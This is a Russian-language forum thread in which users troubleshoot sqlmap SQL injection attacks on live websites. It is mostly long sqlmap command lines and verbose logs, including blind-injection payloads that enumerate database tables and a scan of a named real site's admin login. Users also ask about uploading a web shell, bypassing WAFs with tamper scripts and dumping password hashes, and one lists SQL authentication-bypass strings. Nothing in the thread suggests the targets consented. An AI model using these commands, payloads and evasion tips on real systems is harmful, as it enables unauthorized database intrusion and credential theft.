Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. ms13

    ms13 Level 8

    Joined:
    19 Jun 2015
    Messages:
    1,762
    Likes Received:
    6,559
    Reputations:
    96
    враньё какое ...
     
  2. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    253
    Likes Received:
    14
    Reputations:
    0
    У меня этот тип дыр SQLmap быстро вскрывает
     
  3. ms13

    ms13 Level 8

    Joined:
    19 Jun 2015
    Messages:
    1,762
    Likes Received:
    6,559
    Reputations:
    96
    Ого, таки похекал ту ico корпорацию?
     
    BabaDook likes this.
  4. Mafter

    Mafter New Member

    Joined:
    29 Mar 2018
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    а если в Blind SQL injection тоже самое, что и в SQL injection?? То есть, ссылки одинаковые
     
  5. Миxей

    Миxей Member

    Joined:
    26 Aug 2009
    Messages:
    10
    Likes Received:
    12
    Reputations:
    0
    Как залить Shell посредством sqlmap ?
    --os-shell и брутить локальные пути ?
     
  6. panic.ker

    panic.ker Member

    Joined:
    25 Aug 2013
    Messages:
    44
    Likes Received:
    22
    Reputations:
    2
    Тебе в соседней теме ответили, у пользователя под которым ты сидишь не хватает прав для этого!
     
  7. RedFern.89

    RedFern.89 Member

    Joined:
    20 Jan 2010
    Messages:
    572
    Likes Received:
    45
    Reputations:
    0
    Подскажите, как бороться? Пытаюсь получить таблицы - выдает 406 ошибку
    Code:
    sqlmap.py -r 1.txt --level=1 --risk=1 --banner -v 3 --union-cols=1-66
    --dbms="MySQL" --technique=EBU --identify-waf --no-cast -D database --
    tables
            ___
           __H__
     ___ ___[)]_____ ___ ___  {1.2.4.2#dev}
    |_ -| . [)]     | .'| . |
    |___|_  [(]_|_|_|__,|  _|
          |_|V          |_|   http://sqlmap.org
    
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
     consent is illegal. It is the end user's responsibility to obey all applicable
    local, state and federal laws. Developers assume no liability and are not respon
    sible for any misuse or damage caused by this program
    
    [*] starting at 01:56:40
    
    [01:56:40] [INFO] parsing HTTP request from '1.txt'
    [01:56:40] [DEBUG] not a valid WebScarab log data
    [01:56:40] [DEBUG] cleaning up configuration parameters
    [01:56:40] [DEBUG] loading WAF script '360'
    [01:56:40] [DEBUG] loading WAF script 'airlock'
    [01:56:40] [DEBUG] loading WAF script 'anquanbao'
    [01:56:40] [DEBUG] loading WAF script 'armor'
    [01:56:40] [DEBUG] loading WAF script 'asm'
    [01:56:40] [DEBUG] loading WAF script 'aws'
    [01:56:40] [DEBUG] loading WAF script 'baidu'
    [01:56:40] [DEBUG] loading WAF script 'barracuda'
    [01:56:40] [DEBUG] loading WAF script 'bigip'
    [01:56:40] [DEBUG] loading WAF script 'binarysec'
    [01:56:40] [DEBUG] loading WAF script 'blockdos'
    [01:56:40] [DEBUG] loading WAF script 'ciscoacexml'
    [01:56:40] [DEBUG] loading WAF script 'cloudflare'
    [01:56:40] [DEBUG] loading WAF script 'cloudfront'
    [01:56:40] [DEBUG] loading WAF script 'comodo'
    [01:56:40] [DEBUG] loading WAF script 'datapower'
    [01:56:40] [DEBUG] loading WAF script 'denyall'
    [01:56:40] [DEBUG] loading WAF script 'dosarrest'
    [01:56:40] [DEBUG] loading WAF script 'dotdefender'
    [01:56:40] [DEBUG] loading WAF script 'edgecast'
    [01:56:40] [DEBUG] loading WAF script 'expressionengine'
    [01:56:40] [DEBUG] loading WAF script 'fortiweb'
    [01:56:40] [DEBUG] loading WAF script 'generic'
    [01:56:40] [DEBUG] loading WAF script 'hyperguard'
    [01:56:40] [DEBUG] loading WAF script 'incapsula'
    [01:56:40] [DEBUG] loading WAF script 'isaserver'
    [01:56:40] [DEBUG] loading WAF script 'jiasule'
    [01:56:40] [DEBUG] loading WAF script 'knownsec'
    [01:56:40] [DEBUG] loading WAF script 'kona'
    [01:56:40] [DEBUG] loading WAF script 'modsecurity'
    [01:56:40] [DEBUG] loading WAF script 'naxsi'
    [01:56:40] [DEBUG] loading WAF script 'netcontinuum'
    [01:56:40] [DEBUG] loading WAF script 'netscaler'
    [01:56:40] [DEBUG] loading WAF script 'newdefend'
    [01:56:40] [DEBUG] loading WAF script 'nsfocus'
    [01:56:40] [DEBUG] loading WAF script 'paloalto'
    [01:56:40] [DEBUG] loading WAF script 'profense'
    [01:56:40] [DEBUG] loading WAF script 'proventia'
    [01:56:40] [DEBUG] loading WAF script 'radware'
    [01:56:40] [DEBUG] loading WAF script 'requestvalidationmode'
    [01:56:40] [DEBUG] loading WAF script 'safe3'
    [01:56:40] [DEBUG] loading WAF script 'safedog'
    [01:56:40] [DEBUG] loading WAF script 'secureiis'
    [01:56:40] [DEBUG] loading WAF script 'senginx'
    [01:56:40] [DEBUG] loading WAF script 'sitelock'
    [01:56:40] [DEBUG] loading WAF script 'sonicwall'
    [01:56:40] [DEBUG] loading WAF script 'sophos'
    [01:56:40] [DEBUG] loading WAF script 'stingray'
    [01:56:40] [DEBUG] loading WAF script 'sucuri'
    [01:56:40] [DEBUG] loading WAF script 'tencent'
    [01:56:40] [DEBUG] loading WAF script 'teros'
    [01:56:40] [DEBUG] loading WAF script 'trafficshield'
    [01:56:40] [DEBUG] loading WAF script 'urlscan'
    [01:56:40] [DEBUG] loading WAF script 'uspses'
    [01:56:40] [DEBUG] loading WAF script 'varnish'
    [01:56:40] [DEBUG] loading WAF script 'wallarm'
    [01:56:40] [DEBUG] loading WAF script 'watchguard'
    [01:56:40] [DEBUG] loading WAF script 'webappsecure'
    [01:56:40] [DEBUG] loading WAF script 'webknight'
    [01:56:40] [DEBUG] loading WAF script 'wordfence'
    [01:56:40] [DEBUG] loading WAF script 'yundun'
    [01:56:40] [DEBUG] loading WAF script 'yunsuo'
    [01:56:40] [DEBUG] loading WAF script 'zenedge'
    [01:56:40] [DEBUG] setting the HTTP timeout
    [01:56:40] [DEBUG] creating HTTP requests opener object
    [01:56:40] [DEBUG] forcing back-end DBMS to user defined value
    custom injection marker ('*') found in option '--data'. Do you want to process i
    t? [Y/n/q] y
    [01:56:41] [DEBUG] resolving hostname 'url'
    [01:56:41] [INFO] testing connection to the target URL
    [01:56:41] [DEBUG] declared web page charset 'utf-8'
    [01:56:41] [CRITICAL] previous heuristics detected that the target is protected
    by some kind of WAF/IPS/IDS
    [01:56:41] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
    [01:56:41] [DEBUG] checking for WAF/IPS/IDS product '360 Web Application Firewal
    l (360)'
    [01:56:41] [DEBUG] declared web page charset 'iso-8859-1'
    [01:56:41] [DEBUG] got HTTP error code: 406 (Not Acceptable)
    [01:56:42] [DEBUG] got HTTP error code: 406 (Not Acceptable)
    [01:56:42] [DEBUG] got HTTP error code: 406 (Not Acceptable)
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Airlock (Phion/Ergon)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Anquanbao Web Application F
    irewall (Anquanbao)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Armor Protection (Armor Def
    ense)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Application Security Manage
    r (F5 Networks)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Amazon Web Services Web App
    lication Firewall (Amazon)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Yunjiasu Web Application Fi
    rewall (Baidu)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Barracuda Web Application F
    irewall (Barracuda Networks)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'BIG-IP Application Security
     Manager (F5 Networks)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'BinarySEC Web Application F
    irewall (BinarySEC)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'BlockDoS'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Cisco ACE XML Gateway (Cisc
    o Systems)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'CloudFlare Web Application
    Firewall (CloudFlare)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'CloudFront (Amazon)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Comodo Web Application Fire
    wall (Comodo)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'IBM WebSphere DataPower (IB
    M)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Deny All Web Application Fi
    rewall (DenyAll)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'DOSarrest (DOSarrest Intern
    et Security)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'dotDefender (Applicure Tech
    nologies)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'EdgeCast WAF (Verizon)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'ExpressionEngine (EllisLab)
    '
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'FortiWeb Web Application Fi
    rewall (Fortinet)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Hyperguard Web Application
    Firewall (art of defence)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Incapsula Web Application F
    irewall (Incapsula/Imperva)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'ISA Server (Microsoft)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Jiasule Web Application Fir
    ewall (Jiasule)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'KS-WAF (Knownsec)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'KONA Security Solutions (Ak
    amai Technologies)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'ModSecurity: Open Source We
    b Application Firewall (Trustwave)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'NAXSI (NBS System)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'NetContinuum Web Applicatio
    n Firewall (NetContinuum/Barracuda Networks)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'NetScaler (Citrix Systems)'
    
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Newdefend Web Application F
    irewall (Newdefend)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'NSFOCUS Web Application Fir
    ewall (NSFOCUS)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Palo Alto Firewall (Palo Al
    to Networks)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Profense Web Application Fi
    rewall (Armorlogic)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Proventia Web Application S
    ecurity (IBM)'
    [01:56:42] [DEBUG] page not found (404)
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'AppWall (Radware)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'ASP.NET RequestValidationMo
    de (Microsoft)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Safe3 Web Application Firew
    all'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Safedog Web Application Fir
    ewall (Safedog)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'SecureIIS Web Server Securi
    ty (BeyondTrust)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'SEnginx (Neusoft Corporatio
    n)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'TrueShield Web Application
    Firewall (SiteLock)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'SonicWALL (Dell)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'UTM Web Protection (Sophos)
    '
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Stingray Application Firewa
    ll (Riverbed / Brocade)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'CloudProxy WebSite Firewall
     (Sucuri)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Tencent Cloud Web Applicati
    on Firewall (Tencent Cloud Computing)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Teros/Citrix Application Fi
    rewall Enterprise (Teros/Citrix Systems)'
    [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'TrafficShield (F5 Networks)
    '
    [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'UrlScan (Microsoft)'
    [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'USP Secure Entry Server (Un
    ited Security Providers)'
    [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Varnish FireWall (OWASP)'
    [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Wallarm Web Application Fir
    ewall (Wallarm)'
    [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'WatchGuard (WatchGuard Tech
    nologies)'
    [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'webApp.secure (webScurity)'
    
    [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'WebKnight Application Firew
    all (AQTRONIX)'
    [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Wordfence (Feedjit)'
    [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Yundun Web Application Fire
    wall (Yundun)'
    [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Yunsuo Web Application Fire
    wall (Yunsuo)'
    [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Zenedge Web Application Fir
    ewall (Zenedge)'
    [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Generic (Unknown)'
    [01:56:43] [CRITICAL] WAF/IPS/IDS identified as 'Generic (Unknown)'
    [01:56:43] [WARNING] WAF/IPS/IDS specific response can be found in 'c:\users\art
    em\appdata\local\temp\sqlmapuumtkb12408\sqlmapresponse-opc2v1'. If you know the
    details on used protection please report it along with specific response to 'dev
    @sqlmap.org'
    are you sure that you want to continue with further target testing? [y/N] y
    [01:56:44] [WARNING] please consider usage of tamper scripts (option '--tamper')
    
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: #1* ((custom) POST)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: EmailAddress=1' AND 3169=3169 AND 'pwZw'='pwZw
        Vector: AND [INFERENCE]
    ---
    [01:56:44] [INFO] testing MySQL
    [01:56:44] [DEBUG] resuming configuration option 'code' (200)
    [01:56:44] [INFO] confirming MySQL
    [01:56:44] [INFO] the back-end DBMS is MySQL
    [01:56:44] [INFO] fetching banner
    [01:56:44] [INFO] resumed: 5.6.39-cll-lve
    [01:56:44] [DEBUG] performed 0 queries in 0.00 seconds
    web application technology: Apache, PHP 7.1.14
    back-end DBMS: MySQL >= 5.0.0
    banner:    '5.6.39-cll-lve'
    [01:56:44] [INFO] fetching tables for database: 'database'
    [01:56:44] [INFO] fetching number of tables for database 'database'
    [01:56:44] [WARNING] running in a single-thread mode. Please consider usage of o
    ption '--threads' for faster data retrieval
    [01:56:44] [PAYLOAD] 1' AND ORD(MID((SELECT COUNT(table_name) FROM INFORMATION_S
    CHEMA.TABLES WHERE table_schema=0x6c617265636f696e5f616c6c5f7573657273),1,1))>51
     AND 'tjzX'='tjzX
    [01:56:44] [DEBUG] got HTTP error code: 406 (Not Acceptable)
    [01:56:44] [WARNING] unexpected HTTP code '406' detected. Will use (extra) valid
    ation step in similar cases
    [01:56:44] [PAYLOAD] 1' AND ORD(MID((SELECT COUNT(table_name) FROM INFORMATION_S
    CHEMA.TABLES WHERE table_schema=0x6c617265636f696e5f616c6c5f7573657273),1,1))>48
     AND 'tjzX'='tjzX
    [01:56:44] [DEBUG] got HTTP error code: 406 (Not Acceptable)
    [01:56:44] [PAYLOAD] 1' AND ORD(MID((SELECT COUNT(table_name) FROM INFORMATION_S
    CHEMA.TABLES WHERE table_schema=0x6c617265636f696e5f616c6c5f7573657273),1,1))>9
    AND 'tjzX'='tjzX
    [01:56:44] [DEBUG] got HTTP error code: 406 (Not Acceptable)
    [01:56:44] [INFO] retrieved:
    [01:56:44] [DEBUG] performed 3 queries in 0.51 seconds
    [01:56:44] [WARNING] unable to retrieve the number of tables for database 'database'
    [01:56:44] [ERROR] unable to retrieve the table names for any database
    do you want to use common table existence check? [y/N/q] n
    No tables found
    [01:56:46] [WARNING] HTTP error codes detected during run:
    404 (Not Found) - 1 times, 406 (Not Acceptable) - 6 times
    [01:56:46] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some
     kind of protection is involved (e.g. WAF)
    [01:56:46] [INFO] fetched data logged to text files under 'C:\Users\user\.sqlma
    p\output\url'
    
     
  8. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    783
    Likes Received:
    912
    Reputations:
    58
    Waf обходить.
     
  9. RedFern.89

    RedFern.89 Member

    Joined:
    20 Jan 2010
    Messages:
    572
    Likes Received:
    45
    Reputations:
    0
    waf generic не разу с ним не сталкивался. под него вообще tamper есть в мапе?
     
  10. LoginUserName

    LoginUserName New Member

    Joined:
    14 Apr 2018
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Мап криво сливает пароли, вот так $1$JJCSUHzQ$fJoUTRgTvE\\/6CsiTRtfFC. при том каждый раз в разных местах подставляет слэшы, как можно исправить проблему? Это md5(unix) хеш
     
  11. Muracha

    Muracha New Member

    Joined:
    30 Jul 2011
    Messages:
    127
    Likes Received:
    3
    Reputations:
    0
    использую sqlmap для вывода таблиц методом POST
    Очень смущает, что когда смотришь вручную там ошибка при поставки admin'
    Code:
    You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' LIMIT 2' at line 1

    Или пользователь не найдет если подставлять:

    Code:
    username=" or ""="&" or ""="=admin&login=1
    Sqlmap говорит вообще разные вещи

    Как вывести таблицу или хотя бы авторизоваться админом?
    И почему не выводится стандартными средствами sqlmap?


    root@kali:~# sqlmap -u http://advert.kp.ru/admin//index.php --data "username=admin&passw=admin&login=1" --threads 10 --random-agent --dbms=mysql
    Code:
            ___
           __H__
     ___ ___[.]_____ ___ ___  {1.1.12#stable}
    |_ -| . ["]     | .'| . |
    |___|_  [,]_|_|_|__,|  _|
          |_|V          |_|   http://sqlmap.org
    
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    
    [*] starting at 21:38:30
    
    [21:38:30] [INFO] fetched random HTTP User-Agent header from file '/usr/share/sqlmap/txt/user-agents.txt': 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.3) Gecko/20060326 Firefox/1.5.0.3 (Debian-1.5.dfsg+1.5.0.3-2)'
    [21:38:31] [INFO] testing connection to the target URL
    [21:38:31] [INFO] testing if the target URL content is stable
    [21:38:32] [INFO] target URL content is stable
    [21:38:32] [INFO] testing if POST parameter 'username' is dynamic
    [21:38:32] [INFO] confirming that POST parameter 'username' is dynamic
    [21:38:32] [INFO] POST parameter 'username' is dynamic
    [21:38:32] [INFO] heuristic (basic) test shows that POST parameter 'username' might be injectable (possible DBMS: 'MySQL')
    [21:38:33] [INFO] testing for SQL injection on POST parameter 'username'
    for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
    [21:38:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
    [21:38:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
    [21:38:45] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
    [21:38:46] [WARNING] reflective value(s) found and filtering out
    [21:38:59] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)'
    [21:39:07] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
    [21:39:20] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
    [21:39:32] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
    [21:39:44] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
    [21:39:56] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
    [21:40:09] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
    [21:40:22] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
    [21:40:35] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
    [21:40:35] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
    [21:40:36] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace'
    [21:40:36] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (original value)'
    [21:40:36] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
    [21:40:37] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
    [21:40:37] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
    [21:40:37] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
    [21:40:37] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
    [21:40:38] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
    [21:40:38] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
    [21:40:39] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
    [21:40:39] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
    [21:40:40] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
    [21:40:40] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
    [21:40:52] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
    [21:41:03] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
    [21:41:10] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
    [21:41:18] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
    [21:41:26] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
    [21:41:33] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
    [21:41:41] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
    [21:41:49] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
    [21:41:56] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
    [21:42:04] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
    [21:42:12] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
    [21:42:19] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
    [21:42:27] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
    [21:42:35] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
    [21:42:42] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
    [21:42:50] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
    [21:42:57] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
    [21:43:03] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
    [21:43:03] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
    [21:43:04] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
    [21:43:04] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
    [21:43:04] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
    [21:43:04] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
    [21:43:04] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
    [21:43:04] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
    [21:43:05] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
    [21:43:05] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
    [21:43:05] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
    [21:43:06] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
    [21:43:06] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
    [21:43:06] [INFO] testing 'MySQL inline queries'
    [21:43:06] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
    [21:43:13] [INFO] testing 'MySQL > 5.0.11 stacked queries'
    [21:43:20] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
    [21:43:26] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
    [21:43:33] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
    [21:43:39] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
    [21:43:47] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
    [21:43:54] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
    [21:44:02] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (comment)'
    [21:44:13] [INFO] POST parameter 'username' appears to be 'MySQL >= 5.0.12 AND time-based blind (comment)' injectable
    [21:44:13] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
    [21:44:13] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
    [21:44:13] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
    [21:44:13] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
    [21:44:14] [INFO] target URL appears to have 5 columns in query
    injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
    [21:44:56] [INFO] testing 'MySQL UNION query (30) - 21 to 40 columns'
    [21:44:59] [INFO] testing 'MySQL UNION query (60) - 41 to 60 columns'
    [21:45:02] [INFO] testing 'MySQL UNION query (30) - 61 to 80 columns'
    [21:45:05] [INFO] testing 'MySQL UNION query (30) - 81 to 100 columns'
    [21:45:08] [INFO] checking if the injection point on POST parameter 'username' is a false positive
    [21:45:08] [WARNING] false positive or unexploitable injection point detected
    [21:45:08] [WARNING] POST parameter 'username' does not seem to be injectable
    [21:45:08] [INFO] testing if POST parameter 'passw' is dynamic
    [21:45:08] [WARNING] POST parameter 'passw' does not appear to be dynamic
    [21:45:08] [WARNING] heuristic (basic) test shows that POST parameter 'passw' might not be injectable
    
    
     
  12. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    107
    Likes Received:
    9
    Reputations:
    0
    --data "username=admin&passw=admin&login=1" --threads 10 --random-agent --dbms=mysql -p username
    or
    --data "username=admin*&passw=admin&login=1" --threads 10 --random-agent --dbms=mysql


    может быть waf или вообще обычная ошибка базы.
     
  13. Muracha

    Muracha New Member

    Joined:
    30 Jul 2011
    Messages:
    127
    Likes Received:
    3
    Reputations:
    0
    Ни один из пунктов выше, увы не сработал. Интересно то что ради эксперемента вбил:
    Code:
    --level=1 --risk=1 --banner -v 3 --union-cols=1-66
    --dbms="MySQL" --technique=EBU --identify-waf --no-cast
    Которые в свою очередь так же не сработали.
     
  14. LoginUserName

    LoginUserName New Member

    Joined:
    14 Apr 2018
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Никто не знает как мап заставить дампить не криво?
     
  15. Muracha

    Muracha New Member

    Joined:
    30 Jul 2011
    Messages:
    127
    Likes Received:
    3
    Reputations:
    0
    Может дело не в sqlmap? я бы попробовал заюзать sqlmap из другой папки, из под kali linux или вообще не sqlmap - если все тоже самое, ну дело не в мапе.
     
  16. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    344
    Likes Received:
    278
    Reputations:
    86
    Скорее всего это не sqlmap сливает "криво", а скрипт в котором найдена инъекция экранирует слеши. Попробуйте проверить руками вывод!
    А вы пробовали вручную получить результат? Или кроме как через sqlmap работать с инъекцией в БД вы не умеете? sqlmap - не панацея!
     
  17. Muracha

    Muracha New Member

    Joined:
    30 Jul 2011
    Messages:
    127
    Likes Received:
    3
    Reputations:
    0
    Делал
    Разумеется делал!

    Перебрал сначала возможность авторизации при которой выдавалое сообщение "пользователь не найдет в базе данных".
    Синтаксическая ошибка не высвечивалась. Уязвимое только поле "username", на passwd -ноль реакции.
    Code:
    ' OR '1
    ' OR 1 -- -
    " OR "" = "
    " OR 1 = 1 -- -
    '='
    'LIKE'
    '=0--+
